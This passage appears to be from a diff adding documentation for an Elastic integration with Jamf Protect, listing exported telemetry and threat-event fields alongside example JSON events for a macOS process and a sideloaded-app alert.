keyword | +| threat.tactic.name | Name of the type of tactic used by this threat. 
You can use a MITRE ATT&CK® tactic, for example. (ex. https://attack.mitre.org/tactics/TA0002/) | keyword | +| threat.tactic.reference | The reference url of tactic used by this threat. You can use a MITRE ATT&CK® tactic, for example. (ex. https://attack.mitre.org/tactics/TA0002/ ) | keyword | +| threat.technique.id | The id of technique used by this threat. You can use a MITRE ATT&CK® technique, for example. (ex. https://attack.mitre.org/techniques/T1059/) | keyword | +| threat.technique.name | The name of technique used by this threat. You can use a MITRE ATT&CK® technique, for example. (ex. https://attack.mitre.org/techniques/T1059/) | keyword | +| threat.technique.name.text | Multi-field of `threat.technique.name`. | match_only_text | +| threat.technique.reference | The reference url of technique used by this threat. You can use a MITRE ATT&CK® technique, for example. (ex. https://attack.mitre.org/techniques/T1059/) | keyword | +| user.domain | Name of the directory the user is a member of. For example, an LDAP or Active Directory domain name. | keyword | +| user.email | User email address. | keyword | +| user.id | Unique identifier of the user. | keyword | +| user.name | Short name or login of the user. | keyword | +| user.name.text | Multi-field of `user.name`. | match_only_text | +| volume.bus_type | | keyword | +| volume.file_system_type | | keyword | +| volume.nt_name | | keyword | +| volume.product_id | | keyword | +| volume.product_name | | keyword | +| volume.removable | | boolean | +| volume.serial_number | | keyword | +| volume.size | | long | +| volume.vendor_id | | keyword | +| volume.vendor_name | | keyword | +| volume.writable | | boolean | + + +#### telemetry + +This is the `Telemetry` dataset. 
+ +##### Example + +An example event for `telemetry` looks as following: + +```json +{ + "@timestamp": "2024-02-06T16:01:34.442Z", + "ecs": { + "version": "8.11.0" + }, + "error": { + "code": "0" + }, + "event": { + "action": "aue_posix_spawn", + "category": [ + "authentication" + ], + "code": "43190", + "kind": "event", + "outcome": "success", + "type": [ + "info" + ] + }, + "host": { + "hostname": "Mac mini", + "id": "H2WGF2U9Q6NV", + "ip": [ + "0.0.0.0" + ], + "os": { + "version": "Version 14.2.1 (Build 23C71)" + } + }, + "process": { + "args": [ + "/usr/bin/profiles", + "status", + "-type", + "enrollment" + ], + "code_signature": { + "signing_id": "com.microsoft.EdgeUpdater", + "team_id": "UBF8T346G9" + }, + "exit_code": 0, + "hash": { + "sha1": "9cfc802baf45b74693d146686ebe9ec59ac6367f" + }, + "real_group": { + "id": "0", + "name": "wheel" + }, + "real_user": { + "id": "4294967295" + }, + "user": { + "id": "0", + "name": "root" + } + }, + "related": { + "hash": [ + "9cfc802baf45b74693d146686ebe9ec59ac6367f" + ], + "hosts": [ + "Mac mini" + ], + "ip": [ + "0.0.0.0" + ], + "user": [ + "root" + ] + }, + "user": { + "id": "0", + "name": [ + "root" + ] + } +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| cloud.account.id | The cloud account or organization ID used to identify different entities in a multi-tenant environment. Examples: AWS account ID, Google Cloud ORG ID, or other unique identifier. | keyword | +| cloud.availability_zone | Availability zone in which this host is running. | keyword | +| cloud.image.id | Image ID for the cloud instance. | keyword | +| cloud.instance.id | Instance ID of the host machine. | keyword | +| cloud.instance.name | Instance name of the host machine. | keyword | +| cloud.machine.type | Machine type of the host machine. | keyword | +| cloud.project.id | Name of the project in Google Cloud. | keyword | +| cloud.provider | Name of the cloud provider. 
Example values are aws, azure, gcp, or digitalocean. | keyword | +| cloud.region | Region in which this host is running. | keyword | +| container.id | Unique container ID. | keyword | +| container.image.name | Name of the image the container was built on. | keyword | +| container.labels | Image labels. | object | +| container.name | Container name. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| error.code | Error code describing the error. | keyword | +| event.action | The action captured by the event. This describes the information in the event. It is more specific than `event.category`. Examples are `group-add`, `process-started`, `file-created`. The value is normally defined by the implementer. | keyword | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.code | Identification code for this event, if one exists. Some event sources use event codes to identify messages unambiguously, regardless of message language or wording adjustments over time. An example of this is the Windows Event ID. 
| keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.dataset | Name of the dataset. | constant_keyword | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.module | Event module. | constant_keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| event.outcome | This is one of four ECS Categorization Fields, and indicates the lowest level in the ECS category hierarchy. 
`event.outcome` simply denotes whether the event represents a success or a failure from the perspective of the entity that produced the event. Note that when a single transaction is described in multiple events, each event may populate different values of `event.outcome`, according to their perspective. Also note that in the case of a compound event (a single event that contains multiple logical events), this field should be populated with the value that best captures the overall success or failure from the perspective of the event producer. Further note that not all events will have an associated outcome. For example, this field is generally not populated for metric events, events with `event.type:info`, or any events for which an outcome does not make logical sense. | keyword | +| event.type | This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. This field is an array. This will allow proper categorization of some events that fall in multiple event types. | keyword | +| file.hash.sha1 | SHA1 hash. | keyword | +| file.path | Full path to the file, including the file name. It should include the drive letter, when appropriate. | keyword | +| file.path.text | Multi-field of `file.path`. | match_only_text | +| host.architecture | Operating system architecture. | keyword | +| host.containerized | If the host is a container. | boolean | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | +| host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. 
| keyword | +| host.id | Unique host ID. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | +| host.ip | Host IP addresses. | ip | +| host.mac | Host mac addresses. | keyword | +| host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword | +| host.os.build | OS build information. | keyword | +| host.os.codename | OS codename, if any. | keyword | +| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | +| host.os.kernel | Operating system kernel version as a raw string. | keyword | +| host.os.name | Operating system name, without the version. | keyword | +| host.os.name.text | Multi-field of `host.os.name`. | text | +| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.type | Use the `os.type` field to categorize the operating system into one of the broad commercial families. If the OS you're dealing with is not listed as an expected value, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. | keyword | +| host.os.version | Operating system version as a raw string. | keyword | +| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. 
| keyword | +| input.type | Input type | keyword | +| jamf_protect.telemetry.arguments.addr | | keyword | +| jamf_protect.telemetry.arguments.am_failure | | keyword | +| jamf_protect.telemetry.arguments.am_success | | keyword | +| jamf_protect.telemetry.arguments.authenticated | | flattened | +| jamf_protect.telemetry.arguments.child.pid | | long | +| jamf_protect.telemetry.arguments.data | | keyword | +| jamf_protect.telemetry.arguments.detail | | keyword | +| jamf_protect.telemetry.arguments.domain | | keyword | +| jamf_protect.telemetry.arguments.fd | | keyword | +| jamf_protect.telemetry.arguments.flags | | keyword | +| jamf_protect.telemetry.arguments.flattened | | flattened | +| jamf_protect.telemetry.arguments.known_uid | | keyword | +| jamf_protect.telemetry.arguments.pid | | long | +| jamf_protect.telemetry.arguments.port | | long | +| jamf_protect.telemetry.arguments.priority | | long | +| jamf_protect.telemetry.arguments.process | | keyword | +| jamf_protect.telemetry.arguments.protocol | | keyword | +| jamf_protect.telemetry.arguments.request | | keyword | +| jamf_protect.telemetry.arguments.sflags | | keyword | +| jamf_protect.telemetry.arguments.signal | | keyword | +| jamf_protect.telemetry.arguments.target.port | | long | +| jamf_protect.telemetry.arguments.task.port | | long | +| jamf_protect.telemetry.arguments.type | | keyword | +| jamf_protect.telemetry.arguments.which | | keyword | +| jamf_protect.telemetry.arguments.who | | keyword | +| jamf_protect.telemetry.attributes.device | | keyword | +| jamf_protect.telemetry.attributes.file.access_mode | | keyword | +| jamf_protect.telemetry.attributes.file.system.id | | keyword | +| jamf_protect.telemetry.attributes.node.id | | keyword | +| jamf_protect.telemetry.attributes.owner.group.id | | keyword | +| jamf_protect.telemetry.attributes.owner.group.name | | keyword | +| jamf_protect.telemetry.dataset | | keyword | +| jamf_protect.telemetry.event_attributes.activity_identifier | | keyword | +| 
jamf_protect.telemetry.event_attributes.assessments_enabled | | long | +| jamf_protect.telemetry.event_attributes.attributes.ctime | | date | +| jamf_protect.telemetry.event_attributes.attributes.mtime | | date | +| jamf_protect.telemetry.event_attributes.attributes.path | | keyword | +| jamf_protect.telemetry.event_attributes.attributes.quarantine.agent_bundle_identifier | | keyword | +| jamf_protect.telemetry.event_attributes.attributes.quarantine.agent_name | | keyword | +| jamf_protect.telemetry.event_attributes.attributes.quarantine.data_url_string | | keyword | +| jamf_protect.telemetry.event_attributes.attributes.quarantine.event_identifier | | keyword | +| jamf_protect.telemetry.event_attributes.attributes.quarantine.origin_url_string | | keyword | +| jamf_protect.telemetry.event_attributes.attributes.quarantine.timestamp | | date | +| jamf_protect.telemetry.event_attributes.attributes.requirement | | keyword | +| jamf_protect.telemetry.event_attributes.audit_event.excluded_processes | | keyword | +| jamf_protect.telemetry.event_attributes.audit_event.excluded_users | | keyword | +| jamf_protect.telemetry.event_attributes.audit_event_log_verbose_messages | | keyword | +| jamf_protect.telemetry.event_attributes.audit_level | | long | +| jamf_protect.telemetry.event_attributes.backtrace.frames.image_offset | | long | +| jamf_protect.telemetry.event_attributes.backtrace.frames.image_uuid | | keyword | +| jamf_protect.telemetry.event_attributes.build_alias_of | | keyword | +| jamf_protect.telemetry.event_attributes.build_version | | keyword | +| jamf_protect.telemetry.event_attributes.category | | keyword | +| jamf_protect.telemetry.event_attributes.cf_bundle_short_version_string | | keyword | +| jamf_protect.telemetry.event_attributes.cf_bundle_version | | keyword | +| jamf_protect.telemetry.event_attributes.dev_id_enabled | | long | +| jamf_protect.telemetry.event_attributes.event.message | | keyword | +| jamf_protect.telemetry.event_attributes.event.type | | 
keyword | +| jamf_protect.telemetry.event_attributes.file_event.exclusion_paths | | keyword | +| jamf_protect.telemetry.event_attributes.file_event.inclusion_paths | | keyword | +| jamf_protect.telemetry.event_attributes.file_event.use_fuzzy_match | | long | +| jamf_protect.telemetry.event_attributes.file_license_info.license_expiration_date | | date | +| jamf_protect.telemetry.event_attributes.file_license_info.license_key | | keyword | +| jamf_protect.telemetry.event_attributes.file_license_info.license_type | | keyword | +| jamf_protect.telemetry.event_attributes.file_license_info.license_version | | keyword | +| jamf_protect.telemetry.event_attributes.format_string | | keyword | +| jamf_protect.telemetry.event_attributes.job.completed_time | | date | +| jamf_protect.telemetry.event_attributes.job.creation_time | | date | +| jamf_protect.telemetry.event_attributes.job.destination | | keyword | +| jamf_protect.telemetry.event_attributes.job.format | | keyword | +| jamf_protect.telemetry.event_attributes.job.id | | keyword | +| jamf_protect.telemetry.event_attributes.job.processing_time | | date | +| jamf_protect.telemetry.event_attributes.job.size | | keyword | +| jamf_protect.telemetry.event_attributes.job.state | | keyword | +| jamf_protect.telemetry.event_attributes.job.title | | keyword | +| jamf_protect.telemetry.event_attributes.job.user | | keyword | +| jamf_protect.telemetry.event_attributes.log.file.location | | keyword | +| jamf_protect.telemetry.event_attributes.log.file.max_number_backups | | long | +| jamf_protect.telemetry.event_attributes.log.file.max_size_mega_bytes | | long | +| jamf_protect.telemetry.event_attributes.log.file.ownership | | keyword | +| jamf_protect.telemetry.event_attributes.log.file.permission | | keyword | +| jamf_protect.telemetry.event_attributes.log.remote_endpoint_enabled | | long | +| jamf_protect.telemetry.event_attributes.log.remote_endpoint_type | | keyword | +| 
jamf_protect.telemetry.event_attributes.log.remote_endpoint_type_awskinesis.access_key_id | | keyword | +| jamf_protect.telemetry.event_attributes.log.remote_endpoint_type_awskinesis.region | | keyword | +| jamf_protect.telemetry.event_attributes.log.remote_endpoint_type_awskinesis.secret_key | | keyword | +| jamf_protect.telemetry.event_attributes.log.remote_endpoint_type_awskinesis.stream_name | | keyword | +| jamf_protect.telemetry.event_attributes.log.remote_endpoint_url | | keyword | +| jamf_protect.telemetry.event_attributes.mach_timestamp | | keyword | +| jamf_protect.telemetry.event_attributes.opaque_version | | keyword | +| jamf_protect.telemetry.event_attributes.parent_activity_identifier | | keyword | +| jamf_protect.telemetry.event_attributes.path | | keyword | +| jamf_protect.telemetry.event_attributes.process.id | | long | +| jamf_protect.telemetry.event_attributes.process.image.path | | keyword | +| jamf_protect.telemetry.event_attributes.process.image.uuid | | keyword | +| jamf_protect.telemetry.event_attributes.project_name | | keyword | +| jamf_protect.telemetry.event_attributes.sender.id | | long | +| jamf_protect.telemetry.event_attributes.sender.image.path | | keyword | +| jamf_protect.telemetry.event_attributes.sender.image.uuid | | keyword | +| jamf_protect.telemetry.event_attributes.sender.program_counter | | long | +| jamf_protect.telemetry.event_attributes.source | | keyword | +| jamf_protect.telemetry.event_attributes.source_version | | keyword | +| jamf_protect.telemetry.event_attributes.subsystem | | keyword | +| jamf_protect.telemetry.event_attributes.thread_id | | keyword | +| jamf_protect.telemetry.event_attributes.timestamp | | date | +| jamf_protect.telemetry.event_attributes.timezone_name | | keyword | +| jamf_protect.telemetry.event_attributes.trace_id | | keyword | +| jamf_protect.telemetry.event_attributes.unified_log_predicates | | keyword | +| jamf_protect.telemetry.event_attributes.version | | keyword | +| 
jamf_protect.telemetry.event_score | | long | +| jamf_protect.telemetry.exec_args.args | | flattened | +| jamf_protect.telemetry.exec_args.args_compiled | | keyword | +| jamf_protect.telemetry.exec_chain_child.parent.path | | text | +| jamf_protect.telemetry.exec_chain_child.parent.uuid | | keyword | +| jamf_protect.telemetry.exec_chain_parent.uuid | | keyword | +| jamf_protect.telemetry.exec_env.env.arch | | keyword | +| jamf_protect.telemetry.exec_env.env.compiled | | keyword | +| jamf_protect.telemetry.exec_env.env.malwarebytes_group | | keyword | +| jamf_protect.telemetry.exec_env.env.path | | text | +| jamf_protect.telemetry.exec_env.env.shell | | keyword | +| jamf_protect.telemetry.exec_env.env.ssh_auth_sock | | keyword | +| jamf_protect.telemetry.exec_env.env.tmpdir | | keyword | +| jamf_protect.telemetry.exec_env.env.xpc.flags | | keyword | +| jamf_protect.telemetry.exec_env.env.xpc.service_name | | keyword | +| jamf_protect.telemetry.exec_env.env_compiled | | keyword | +| jamf_protect.telemetry.exit.return.value | | long | +| jamf_protect.telemetry.exit.status | | keyword | +| jamf_protect.telemetry.file_event_info.eventid_wrapped | | boolean | +| jamf_protect.telemetry.file_event_info.history_done | | boolean | +| jamf_protect.telemetry.file_event_info.item.change_owner | | boolean | +| jamf_protect.telemetry.file_event_info.item.cloned | | boolean | +| jamf_protect.telemetry.file_event_info.item.created | | boolean | +| jamf_protect.telemetry.file_event_info.item.extended_attribute_modified | | boolean | +| jamf_protect.telemetry.file_event_info.item.finder_info_modified | | boolean | +| jamf_protect.telemetry.file_event_info.item.inode_metadata_modified | | boolean | +| jamf_protect.telemetry.file_event_info.item.is_directory | | boolean | +| jamf_protect.telemetry.file_event_info.item.is_file | | boolean | +| jamf_protect.telemetry.file_event_info.item.is_hard_link | | boolean | +| jamf_protect.telemetry.file_event_info.item.is_last_hard_link | | 
boolean | +| jamf_protect.telemetry.file_event_info.item.is_sym_link | | boolean | +| jamf_protect.telemetry.file_event_info.item.removed | | boolean | +| jamf_protect.telemetry.file_event_info.item.renamed | | boolean | +| jamf_protect.telemetry.file_event_info.item.updated | | boolean | +| jamf_protect.telemetry.file_event_info.kernel_dropped | | boolean | +| jamf_protect.telemetry.file_event_info.mount | | boolean | +| jamf_protect.telemetry.file_event_info.must_scan_sub_dir | | boolean | +| jamf_protect.telemetry.file_event_info.none | | boolean | +| jamf_protect.telemetry.file_event_info.own_event | | boolean | +| jamf_protect.telemetry.file_event_info.root_changed | | boolean | +| jamf_protect.telemetry.file_event_info.unmount | | boolean | +| jamf_protect.telemetry.file_event_info.user_dropped | | boolean | +| jamf_protect.telemetry.hardware_event_info.device.class | | keyword | +| jamf_protect.telemetry.hardware_event_info.device.name | | keyword | +| jamf_protect.telemetry.hardware_event_info.device.status | | keyword | +| jamf_protect.telemetry.hardware_event_info.device_attributes.io.cf_plugin_types | | flattened | +| jamf_protect.telemetry.hardware_event_info.device_attributes.io.class_name_override | | keyword | +| jamf_protect.telemetry.hardware_event_info.device_attributes.io.power_management.capability_flags | | keyword | +| jamf_protect.telemetry.hardware_event_info.device_attributes.io.power_management.current_power_state | | long | +| jamf_protect.telemetry.hardware_event_info.device_attributes.io.power_management.device_power_state | | long | +| jamf_protect.telemetry.hardware_event_info.device_attributes.io.power_management.driver_power_state | | long | +| jamf_protect.telemetry.hardware_event_info.device_attributes.io.power_management.max_power_state | | long | +| jamf_protect.telemetry.hardware_event_info.device_attributes.iserial_number | | long | +| jamf_protect.telemetry.hardware_event_info.device_attributes.removable | | keyword | +| 
jamf_protect.telemetry.hardware_event_info.device_attributes.usb.product_name | | keyword | +| jamf_protect.telemetry.hardware_event_info.device_attributes.usb.vendor_name | | keyword | +| jamf_protect.telemetry.header.action | | keyword | +| jamf_protect.telemetry.header.event_modifier | | keyword | +| jamf_protect.telemetry.header.time_milliseconds_offset | | long | +| jamf_protect.telemetry.header.version | | keyword | +| jamf_protect.telemetry.host_info.host.uuid | | keyword | +| jamf_protect.telemetry.identity.cd_hash | | keyword | +| jamf_protect.telemetry.identity.signer.id | | keyword | +| jamf_protect.telemetry.identity.signer.id_truncated | | keyword | +| jamf_protect.telemetry.identity.signer.type | | keyword | +| jamf_protect.telemetry.identity.team.id | | keyword | +| jamf_protect.telemetry.identity.team.id_truncated | | keyword | +| jamf_protect.telemetry.path | | keyword | +| jamf_protect.telemetry.process.effective.group.id | | keyword | +| jamf_protect.telemetry.process.effective.group.name | | keyword | +| jamf_protect.telemetry.process.effective.user.id | | keyword | +| jamf_protect.telemetry.process.effective.user.name | | keyword | +| jamf_protect.telemetry.process.group.id | | keyword | +| jamf_protect.telemetry.process.group.name | | keyword | +| jamf_protect.telemetry.process.name | | keyword | +| jamf_protect.telemetry.process.pid | | long | +| jamf_protect.telemetry.process.session.id | | keyword | +| jamf_protect.telemetry.process.terminal_id.addr | | keyword | +| jamf_protect.telemetry.process.terminal_id.ip_address | | ip | +| jamf_protect.telemetry.process.terminal_id.port | | long | +| jamf_protect.telemetry.process.terminal_id.type | | keyword | +| jamf_protect.telemetry.process.user.id | | keyword | +| jamf_protect.telemetry.process.user.name | | keyword | +| jamf_protect.telemetry.return.description | | keyword | +| jamf_protect.telemetry.signal_event_info.signal | | long | +| jamf_protect.telemetry.socket.inet.addr | | keyword | 
+| jamf_protect.telemetry.socket.inet.family | | keyword | +| jamf_protect.telemetry.socket.inet.id | | keyword | +| jamf_protect.telemetry.socket.unix.family | | keyword | +| jamf_protect.telemetry.socket.unix.path | | text | +| jamf_protect.telemetry.subject.audit.id | | keyword | +| jamf_protect.telemetry.subject.audit.user.name | | keyword | +| jamf_protect.telemetry.subject.effective.group.id | | keyword | +| jamf_protect.telemetry.subject.effective.group.name | | keyword | +| jamf_protect.telemetry.subject.effective.user.id | | keyword | +| jamf_protect.telemetry.subject.effective.user.name | | keyword | +| jamf_protect.telemetry.subject.process.name | | keyword | +| jamf_protect.telemetry.subject.process.pid | | long | +| jamf_protect.telemetry.subject.responsible.process.id | | keyword | +| jamf_protect.telemetry.subject.responsible.process.name | | keyword | +| jamf_protect.telemetry.subject.session.id | | keyword | +| jamf_protect.telemetry.subject.terminal_id.addr | | keyword | +| jamf_protect.telemetry.subject.terminal_id.port | | long | +| jamf_protect.telemetry.subject.terminal_id.type | | keyword | +| jamf_protect.telemetry.texts | | keyword | +| log.offset | Log offset | long | +| log.source.address | Source address from which the log event was read / sent from. | keyword | +| process.args | Array of process arguments, starting with the absolute path to the executable. May be filtered to protect sensitive information. | keyword | +| process.code_signature.signing_id | The identifier used to sign the process. This is used to identify the application manufactured by a software vendor. The field is relevant to Apple \*OS only. | keyword | +| process.code_signature.status | Additional information about the certificate status. This is useful for logging cryptographic errors with the certificate validity or trust status. Leave unpopulated if the validity or trust of the certificate was unchecked. 
| keyword | +| process.code_signature.team_id | The team identifier used to sign the process. This is used to identify the team or vendor of a software product. The field is relevant to Apple \*OS only. | keyword | +| process.exit_code | The exit code of the process, if this is a termination event. The field should be absent if there is no exit code for the event (e.g. process start). | long | +| process.hash.sha1 | SHA1 hash. | keyword | +| process.name | Process name. Sometimes called program name or similar. | keyword | +| process.name.text | Multi-field of `process.name`. | match_only_text | +| process.parent.pid | Process id. | long | +| process.pid | Process id. | long | +| process.real_group.id | Unique identifier for the group on the system/platform. | keyword | +| process.real_group.name | Name of the group. | keyword | +| process.real_user.id | Unique identifier of the user. | keyword | +| process.real_user.name | Short name or login of the user. | keyword | +| process.real_user.name.text | Multi-field of `process.real_user.name`. | match_only_text | +| process.user.id | Unique identifier of the user. | keyword | +| process.user.name | Short name or login of the user. | keyword | +| process.user.name.text | Multi-field of `process.user.name`. | match_only_text | +| related.hash | All the hashes seen on your event. Populating this field, then using it to search for hashes can help in situations where you're unsure what the hash algorithm is (and therefore which key name to search). | keyword | +| related.hosts | All hostnames or other host identifiers seen on your event. Example identifiers include FQDNs, domain names, workstation names, or aliases. | keyword | +| related.ip | All of the IPs seen on your event. | ip | +| related.user | All the user names or other user identifiers seen on the event. | keyword | +| server.ip | IP address of the server (IPv4 or IPv6). | ip | +| server.port | Port of the server. 
| long | +| tags | List of keywords used to tag each event. | keyword | +| user.effective.id | Unique identifier of the user. | keyword | +| user.effective.name | Short name or login of the user. | keyword | +| user.effective.name.text | Multi-field of `user.effective.name`. | match_only_text | +| user.email | User email address. | keyword | +| user.group.id | Unique identifier for the group on the system/platform. | keyword | +| user.group.name | Name of the group. | keyword | +| user.id | Unique identifier of the user. | keyword | +| user.name | Short name or login of the user. | keyword | +| user.name.text | Multi-field of `user.name`. | match_only_text | + + +#### threats event stream + +This is the `Threats Event Stream` dataset. + +##### Example + +An example event for `web_threat_events` looks as following: + +```json +{ + "destination": { + "address": "ip", + "domain": "host", + "port": 80 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "Detected", + "category": [ + "host" + ], + "id": "013b15c9-8f62-4bf1-948a-d82367af2a10", + "kind": "alert", + "module": "jamf_protect", + "provider": "Jamf Protect", + "reason": "Sideloaded App", + "severity": 6, + "start": "2020-01-30T17:47:41.767Z", + "url": "https://radar.wandera.com/security/events/detail/013b15c9-8f62-4bf1-948a-d82367af2a10.SIDE_LOADED_APP_IN_INVENTORY?createdUtcMs=1580406461767" + }, + "file": { + "hash": { + "sha1": "16336078972773bc6c8cef69d722c8c093ba727ddc5bb31eb2", + "sha256": "16336078978a306dc23b67dae9df18bc2a0205e3ff0cbf97c46e76fd670f93fd142d7042" + }, + "name": "Books" + }, + "host": { + "geo": { + "country_iso_code": "gb" + }, + "hostname": "Apple iPhone 11", + "id": "09f81436-de17-441e-a631-0461252c629b", + "os": { + "full": "IOS 11.2.5" + } + }, + "jamf_protect": {}, + "message": "{\"event\":{\"metadata\":{\"schemaVersion\":\"1.0\",\"vendor\":\"Jamf\",\"product\":\"Threat Events 
Stream\"},\"timestamp\":\"2020-01-30T17:47:41.767Z\",\"alertId\":\"013b15c9-8f62-4bf1-948a-d82367af2a10\",\"account\":{\"customerId\":\"fb4567b6-4ee2-3c4c-abb9-4c78ec463b25\",\"parentId\":\"7c302632-7ac4-4234-8ada-11d76feb3730\",\"name\":\"Customer\"},\"device\":{\"deviceId\":\"09f81436-de17-441e-a631-0461252c629b\",\"os\":\"IOS 11.2.5\",\"deviceName\":\"Apple iPhone 11 (11.2.5)\",\"userDeviceName\":\"Apple iPhone 11\",\"externalId\":\"5087dc0e-876c-4b0e-95ea-5b543476e0c4\"},\"eventType\":{\"id\":213,\"description\":\"Sideloaded App\",\"name\":\"SIDE_LOADED_APP_IN_INVENTORY\"},\"app\":{\"id\":\"com.apple.iBooks\",\"name\":\"Books\",\"version\":\"1.1\",\"sha1\":\"16336078972773bc6c8cef69d722c8c093ba727ddc5bb31eb2\",\"sha256\":\"16336078978a306dc23b67dae9df18bc2a0205e3ff0cbf97c46e76fd670f93fd142d7042\"},\"destination\":{\"name\":\"host\",\"ip\":\"ip\",\"port\":80},\"source\":{\"ip\":\"1.2.3.4\",\"port\":3025},\"location\":\"gb\",\"accessPoint\":\"AccessPoint\",\"accessPointBssid\":\"c6:9f:db:b1:73:5a\",\"severity\":6,\"user\":{\"email\":\"user@mail.com\",\"name\":\"John Doe\"},\"eventUrl\":\"https://radar.wandera.com/security/events/detail/013b15c9-8f62-4bf1-948a-d82367af2a10.SIDE_LOADED_APP_IN_INVENTORY?createdUtcMs=1580406461767\",\"action\":\"Detected\"}}", + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "fb4567b6-4ee2-3c4c-abb9-4c78ec463b25" + }, + "rule": { + "description": "Sideloaded App", + "name": "SIDE_LOADED_APP_IN_INVENTORY" + }, + "source": { + "port": 3025 + }, + "user": { + "email": "user@mail.com", + "name": "John Doe" + } +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| container.image.tag | Container image tags. | keyword | +| container.runtime | Runtime managing this container. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. 
| constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| destination.address | Some event destination addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | +| destination.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | +| destination.as.organization.name | Organization name. | keyword | +| destination.as.organization.name.text | Multi-field of `destination.as.organization.name`. | match_only_text | +| destination.domain | The domain name of the destination system. This value may be a host name, a fully qualified domain name, or another host naming format. The value may derive from the original event or be added from enrichment. | keyword | +| destination.geo.city_name | City name. | keyword | +| destination.geo.continent_name | Name of the continent. | keyword | +| destination.geo.country_iso_code | Country ISO code. | keyword | +| destination.geo.country_name | Country name. | keyword | +| destination.geo.location | Longitude and latitude. | geo_point | +| destination.ip | IP address of the destination (IPv4 or IPv6). | ip | +| destination.port | Port of the destination. | long | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| error.message | Error message. | match_only_text | +| event.action | The action captured by the event. This describes the information in the event. It is more specific than `event.category`. Examples are `group-add`, `process-started`, `file-created`. 
The value is normally defined by the implementer. | keyword | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.code | Identification code for this event, if one exists. Some event sources use event codes to identify messages unambiguously, regardless of message language or wording adjustments over time. An example of this is the Windows Event ID. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.dataset | Name of the dataset. | constant_keyword | +| event.duration | Duration of the event in nanoseconds. If `event.start` and `event.end` are known this value should be the difference between the end and start time. | long | +| event.end | `event.end` contains the date when the event ended or when the activity was last observed. | date | +| event.id | Unique ID to describe the event. | keyword | +| event.ingested | Timestamp when an event arrived in the central data store. 
This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date |
+| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword |
+| event.module | Event module. | constant_keyword |
